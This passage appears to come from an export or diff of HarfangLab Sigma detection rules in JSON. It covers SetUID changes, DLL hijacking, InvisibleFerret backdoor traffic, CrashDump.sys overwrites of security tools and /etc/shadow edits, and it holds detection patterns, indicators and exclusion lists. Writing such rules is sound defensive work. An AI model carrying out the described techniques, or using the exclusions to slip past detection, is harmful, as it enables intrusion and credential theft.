/usr/sap/*/exe/*'\n ParentCommandLine|startswith:\n - '/bin/sh ./oraroot.sh '\n - '/bin/sh ./saproot.sh '\n\n exclusion_oracle:\n CommandLine|contains:\n - 'chmod * /u01/app/oracle/'\n - 'chmod ???? /oracle/'\n - 'chmod ???? /exec/oracle/product/'\n - 'chmod ???? /usr/lib/oracle/agent/'\n - 'chmod ???? /opt/ORCLfmap/'\n - 'chmod ???? /opt/oracle/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_cloudera:\n ParentCommandLine|startswith:\n - '/usr/bin/python?.? /opt/cloudera'\n - '/usr/bin/python?.?? /opt/cloudera'\n\n exclusion_oneautomation:\n ProcessCommandLine: 'chmod 4755 /opt/oneautomation/*/agent/bin/ucxj*'\n\n exclusion_docker:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/runc|/usr/bin/dockerd|'\n - '|/usr/sbin/runc|/usr/bin/dockerd|'\n - '|/usr/bin/podman|'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/copiloteagent/copiloteagent|'\n - '|/usr/NX/bin/nxpost|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f", + "rule_name": "SetUID Access Flag Set via chmod/setcap", + "rule_description": "Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\nIt is recommended to analyze the targeted binary as well as the process 
responsible for the setting change and look for privilege escalation and malicious binaries.\n", + "rule_creation_date": "2022-09-26", + "rule_modified_date": "2026-03-23", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1222.002", + "attack.t1548.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.592167Z", + "creation_date": "2026-03-23T11:45:34.592171Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.592179Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_bdeuisrv.yml", + "content": "title: DLL Hijacking via bdeuisrv.exe\nid: 059bfeb6-d7ab-49e8-995d-d3c4bca73b53\ndescription: |\n Detects potential Windows DLL 
Hijacking via bdeuisrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdeuisrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53", + "rule_name": "DLL Hijacking via bdeuisrv.exe", + "rule_description": "Detects potential Windows DLL Hijacking via bdeuisrv.exe.\nDLL hijacking takes 
advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.587052Z", + "creation_date": "2026-03-23T11:45:34.587056Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.587064Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dwwin.yml", + "content": "title: DLL Hijacking via dwwin.exe\nid: 059d6ada-8f39-4f7f-a79a-a0e3ef21e910\ndescription: |\n Detects potential Windows DLL Hijacking via dwwin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dwwin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of 
filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910", + "rule_name": "DLL Hijacking via dwwin.exe", + "rule_description": "Detects potential Windows DLL Hijacking via dwwin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.619386Z", + "creation_date": "2026-03-23T11:45:34.619388Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.619392Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/", + "https://objective-see.org/blog/blog_0x7A.html", + "https://www.group-ib.com/blog/apt-lazarus-python-scripts/", + "https://attack.mitre.org/techniques/T1555/003/" + ], + "name": "t1555_003_invisibleferret_backdoor_linux.yml", + "content": "title: InvisibleFerret Backdoor Communication Detected (Linux)\nid: 05b15125-dd13-43a6-aa65-67a40e6b9fc1\ndescription: |\n Detects network communications related to the InvisibleFerret backdoor.\n InvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\n InvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\n It is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\n - https://objective-see.org/blog/blog_0x7A.html\n - https://www.group-ib.com/blog/apt-lazarus-python-scripts/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/10/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.t1555.003\n - attack.command_and_control\n - attack.t1571\n - attack.exfiltration\n - attack.t1041\n - classification.Linux.Source.NetworkActivity\n 
- classification.Linux.ThreatActor.Lazarus\n - classification.Linux.ThreatActor.DPRK\n - classification.Linux.Malware.InvisibleFerret\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection:\n ProcessCommandLine: 'python* /home/*/.npl'\n ProcessGrandparentImage: '/node'\n DestinationPort:\n - '1224'\n - '2245'\n\n condition: selection\nlevel: critical\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1", + "rule_name": "InvisibleFerret Backdoor Communication Detected (Linux)", + "rule_description": "Detects network communications related to the InvisibleFerret backdoor.\nInvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\nInvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\nIt is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\n", + "rule_creation_date": "2024-10-25", + "rule_modified_date": "2025-02-14", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection", + "attack.command_and_control", + "attack.credential_access", + "attack.exfiltration" + ], + "rule_technique_tags": [ + "attack.t1041", + "attack.t1056.001", + "attack.t1555.003", + "attack.t1571" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.608259Z", + "creation_date": "2026-03-23T11:45:34.608263Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.608270Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1222/002/" + ], + "name": "t1222_002_binary_chmodx_susp_directory.yml", + "content": "title: Suspicious Binary Made Executable\nid: 05e6ac9c-7eac-44f4-a137-10196a85ae1b\ndescription: |\n Detects an attributes change on a file to make it executable in an uncommon directory.\n Adversaries may set the execute bit on a file before executing it.\n Is it recommended to check the harmlessness of the new executable file and for other suspicious behavior from the process modifying the file.\nreferences:\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/07/30\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n Kind: 'chmod'\n PrettyMode|contains: 'x'\n Image|endswith: '/chmod'\n\n selection_path:\n 
Path|startswith:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n selection_ancestors:\n ProcessAncestors|contains:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n exclusion_unix:\n Path: '/private/tmp/.*-unix'\n\n exclusion_adobe:\n Path: '/private/tmp/com.adobe.acrobat.DC/acrobat.plist'\n ProcessCommandLine: '/bin/chmod -R 777 /tmp/com.adobe.acrobat.DC'\n\n exclusion_adobe_updater:\n - Path: '/private/tmp/com.adobe.acrobat.updater'\n ProcessCommandLine: 'chmod o+w /tmp/com.adobe.acrobat.updater'\n - Path: '/private/tmp/com.adobe.AcrobatRefreshManager'\n ProcessCommandLine: 'chmod go= /tmp/com.adobe.AcrobatRefreshManager'\n\n exclusion_ansible:\n Path: '/private/tmp/ansible-tmp-*'\n ProcessCommandLine|startswith: 'chmod u+x /tmp/ansible-tmp-'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n ProcessGrandparentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n\n exclusion_dotnet:\n ProcessParentCommandLine|contains|all:\n - 'dotnet'\n - 'install'\n\n exclusion_jamf:\n - Path: '/Users/Shared/jamfdata'\n ProcessCommandLine: 'chmod -R o-w /System/Volumes/Data/Users/Shared'\n - ProcessParentCommandLine|startswith: '/bin/bash /library/application support/jamf/'\n\n exclusion_maxon:\n Path|startswith:\n - '/Users/Shared/Maxon'\n - '/Users/Shared/Red Giant'\n ProcessCommandLine|startswith:\n - 'chmod -R a+w /Users/Shared/Maxon'\n - 'chmod -R a+w /Users/Shared/Red Giant'\n\n exclusion_tunnelblick:\n Path: '/private/var/root/Library/Application Support/Tunnelblick'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - 
ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n\n exclusion_cisco:\n ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/cisco/secureclient/temp/downloader/vpndownloader.sh'\n - '/bin/bash /opt/cisco/anyconnect/temp/downloader/vpndownloader.sh'\n\n exclusion_cyberwatch:\n ProcessParentCommandLine: 'find /etc/cyberwatch-agent/ -type d -exec chmod 750 {} ;'\n\n exclusion_homebrew:\n ProcessAncestors|contains: '|/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby|'\n\n exclusion_batchmod:\n ProcessParentImage: '/Volumes/Rescue HD/Outils/Utilitaires/BatChmod*/BatChmod.app/Contents/MacOS/BatChmod'\n\n exclusion_munki:\n ProcessParentImage: '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_node:\n ProcessAncestors|contains: '/.nvm/versions/node/v*/bin/node|'\n\n exclusion_claude:\n ProcessGrandparentCommandLine:\n - 'claude'\n - 'node /Users/*/.nvm/versions/node/v*/bin/claude'\n - '*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude *'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b", + "rule_name": "Suspicious Binary Made Executable", + "rule_description": "Detects an attributes change on a file to make it executable in an uncommon directory.\nAdversaries may set the execute bit on a file before executing it.\nIs it recommended to check the harmlessness of the new executable file and for other suspicious behavior from the process modifying the file.\n", + "rule_creation_date": "2024-07-30", + "rule_modified_date": "2025-11-17", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "rule_technique_tags": [ + 
"attack.t1204.002", + "attack.t1222.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.085767Z", + "creation_date": "2026-03-23T11:45:34.085769Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.085774Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg", + "https://attack.mitre.org/techniques/T1562/001/" + ], + "name": "t1562_001_executable_file_overwritten_using_crashdump.yml", + "content": "title: Executable File Overwritten using CrashDump.sys\nid: 05ef230b-2d48-4e49-82a9-20e1fce73c9e\ndescription: |\n Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\n By modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\n Threat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\n It is 
recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\nreferences:\n - https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/02/11\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\DedicatedDumpFile'\n Details|endswith:\n - '.exe'\n - '.sys'\n\n exclusion_citrix:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details|endswith: '\\dedicateddumpfile.sys'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e", + "rule_name": "Executable File Overwritten using CrashDump.sys", + "rule_description": "Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\nBy modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\nThreat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\nIt is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\n", + "rule_creation_date": "2025-02-11", + "rule_modified_date": "2025-08-20", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1562.001" + ], + 
"warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "06168646-4339-42be-bcf4-a8f6ef23f53d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.622141Z", + "creation_date": "2026-03-23T11:45:34.622143Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.622148Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md", + "https://attack.mitre.org/techniques/T1003/008/", + "https://attack.mitre.org/techniques/T1078/" + ], + "name": "t1003_008_etc_shadow_modified.yml", + "content": "title: File /etc/shadow Modified\nid: 06168646-4339-42be-bcf4-a8f6ef23f53d\ndescription: |\n Detects a suspicious attempt to modify /etc/shadow.\n This file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\n It is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\nreferences:\n - 
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/16\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/shadow'\n - TargetPath: '/etc/shadow'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'chmod'\n - 'chown'\n\n exclusion_common:\n ProcessImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/usr/bin/sudo'\n - '/usr/bin/su'\n - '/usr/sbin/sshd'\n - '/usr/sbin/cron'\n - '/usr/sbin/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '/usr/bin/passwd'\n - '/usr/sbin/usermod'\n - '/usr/sbin/useradd'\n - '/usr/sbin/userdel'\n - '/usr/bin/chage'\n - '/kaniko/executor'\n - '/usr/sbin/chpasswd'\n - '/bin/chmod'\n - '/bin/adduser'\n - '/usr/bin/podman'\n - '/usr/bin/rootlesskit'\n - '/usr/sbin/pwconv'\n - '/usr/bin/chsh'\n - '/usr/bin/systemd-sysusers'\n - '/usr/lib/gdm3/gdm-session-worker'\n - '/usr/lib/snapd/snap-update-ns'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - 
